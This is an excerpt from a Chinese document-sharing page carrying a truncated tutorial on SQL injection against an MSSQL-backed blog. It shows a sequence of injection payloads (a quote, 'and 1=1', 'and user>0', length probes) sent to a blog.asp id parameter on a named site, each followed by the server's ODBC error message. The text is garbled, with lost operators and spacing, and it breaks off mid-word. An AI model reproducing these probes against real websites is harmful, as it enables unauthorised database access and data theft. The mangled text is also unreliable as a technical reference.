还剩2页未读,继续阅读
文本内容:
运用SQL Injection做数据库的渗透脚本安全电脑资料如何灵活地运用SQL Injection做数据库渗透的一种思路如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值,.xxxxx./blog.aspid=4当加入’符号进行注入测试时,.xxxxx./blog.aspid=4’出错信息是,[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax errorconverting thevarchar value’4to acolumn ofdata typeint我们知道它不对’符号进行过滤再用如下语句测试,.aquavelvas./blog.aspid=4and1=1出错信息是,[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax errorconverting thevarchar value’4and1=1’to acolumn ofdata typeint好,再来继续测试,.aquavelvas./blog.aspid=4%20and%201=1这次出错讯息不同了,如下[Microsoft][ODBC SQL Server Driver][SQLServer]Line1:Incorrect syntaxnear’and’我们的’符号加对了,再继续测试,.aquavelvas./blog.aspid=4%20and%20user’0出错信息如下,[Microsoft][ODBC SQLServer Driver][SQLServer]Line1:Incorrect syntaxnear’and user’应该是语法不允许直接回值,是不是不能再继续了呢?想想其他办法,就看user值的长度吧,.aquavelvas./blog.aspid=4%20and%20lenuser’0出错信息是,[Microsoft][ODBC SQLServer Driver][SQLServer]Line1:Incorrect syntaxnear’and lenuse...。